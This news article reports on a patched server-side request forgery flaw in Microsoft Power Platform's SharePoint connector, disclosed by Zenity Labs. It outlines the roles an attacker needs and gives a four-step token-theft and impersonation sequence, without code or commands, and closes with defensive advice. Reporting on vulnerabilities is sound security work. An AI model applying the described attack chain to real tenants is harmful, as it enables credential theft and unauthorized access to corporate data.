Microsoft quietly patched a critical vulnerability in its Power Platform that could have let attackers impersonate users, steal credentials, and infiltrate corporate networks. The flaw, disclosed by cybersecurity researchers at Zenity Labs, targeted the SharePoint connector—one of the most widely used tools in Microsoft’s ecosystem.
A Backdoor to Corporate Data
The vulnerability hinged on a server-side request forgery (SSRF) issue that allowed hackers to manipulate the “custom value” functionality within the SharePoint connector. This meant attackers could insert their own URLs into automated workflows, tricking the system into executing unauthorized requests.
While this might sound technical, the consequences were far-reaching. A successful exploit would enable attackers to send commands to the SharePoint API as if they were legitimate users. That means unauthorized access to sensitive files, emails, and corporate databases—all without raising immediate red flags.
More Than Just SharePoint
What made this security hole even more alarming was its potential reach. The flaw wasn’t limited to SharePoint—it also affected Power Automate, Power Apps, Copilot Studio, and Copilot 365. These services are deeply integrated within Microsoft’s Power Platform, meaning a single compromised account could ripple across an entire organization.
Dmitry Lozovoy, a senior security researcher at Zenity Labs, explained it best:
“It increases the likelihood of a successful attack, allowing hackers to target multiple interconnected services within the Power Platform ecosystem.”
Simply put, an attacker who exploited this flaw could do far more than just read documents—they could manipulate workflows, compromise Teams channels, and even escalate their access across the company’s network.
Microsoft’s Patch and the Severity Rating
Microsoft was informed about the vulnerability in September 2024 and released a patch on December 13. The company categorized the issue with an “Important” severity rating—not the highest level but still serious enough to warrant immediate action.
This timeline raises a few concerns. If attackers had discovered and exploited this vulnerability before the patch, companies relying on Power Platform services might have been compromised without even realizing it.
How the Attack Would Work
For an attacker to take advantage of this vulnerability, they needed more than just a clever exploit—they needed access. Specifically, they required two roles in the Power Platform environment:
- Environment Maker – Allows users to create and share apps and workflows.
- Basic User – Grants permission to run apps and interact with shared resources.
Gaining these roles required prior infiltration, meaning attackers had to first compromise an organization through phishing, stolen credentials, or insider access. Once inside, they could escalate their privileges and deploy malicious flows designed to steal SharePoint authentication tokens.
The Exploitation Process
- Create a Malicious Flow: The attacker sets up a workflow using the SharePoint connector.
- Share with a Target User: The flow is disguised as a legitimate request and shared with a low-privileged user.
- Harvest Authentication Tokens: When the user interacts with the flow, their SharePoint JWT access token is leaked.
- Impersonate the User: With the stolen token, the attacker sends unauthorized requests to SharePoint, gaining access to sensitive corporate data.
This attack method wasn’t just theoretical. Security researchers demonstrated how hackers could extend the exploit beyond SharePoint, embedding it into Power Apps, Copilot Studio, and even Teams channels to maximize its impact.
The Bigger Problem: Interconnected Services
The real concern isn’t just this specific vulnerability—it’s how seamlessly integrated Microsoft’s services are. A single security flaw in Power Platform can expose an entire ecosystem of business-critical applications.
For example, by embedding a malicious Canvas app into a Microsoft Teams channel, attackers could lure unsuspecting employees into interacting with it. Once they did, their authentication tokens could be stolen and used to gain deeper access to corporate systems.
As Zenity Labs pointed out:
“The interconnected nature of Power Platform services can result in serious security risks, especially given the widespread use of the SharePoint connector, where a lot of sensitive corporate data is housed.”
This isn’t just a Microsoft issue—it’s a broader challenge facing all companies that rely on cloud-based automation tools. The more interconnected services become, the harder it is to secure them properly.
Microsoft’s Security Response
Microsoft has since closed the loophole, but questions remain. Why did it take nearly three months to patch a vulnerability with such a broad attack surface? Was there any evidence of the flaw being exploited in the wild before the fix?
So far, Microsoft hasn’t reported any known cases of real-world attacks exploiting this issue. However, given the nature of credential theft and post-exploitation activities, it’s possible that some breaches went undetected.
The company advises all Power Platform administrators to review their user permissions and ensure that only trusted users have Environment Maker roles. Additionally, organizations should monitor for unusual API requests, which could indicate unauthorized access attempts.
Broader Implications for Cloud Security
This latest security disclosure highlights a recurring issue in cloud platforms: the difficulty of balancing automation with security.
Similar vulnerabilities have surfaced in other Microsoft services. Just recently, Binary Security uncovered three SSRF flaws in Azure DevOps, which could have been used to gather information about a machine’s configuration. These weaknesses show that even industry giants like Microsoft are struggling to keep their cloud platforms airtight.
For businesses, the takeaway is clear—relying on built-in security isn’t enough. Companies need proactive monitoring, strict access controls, and a security-first approach when deploying low-code automation tools. Otherwise, they risk becoming the next target of an attack they never saw coming.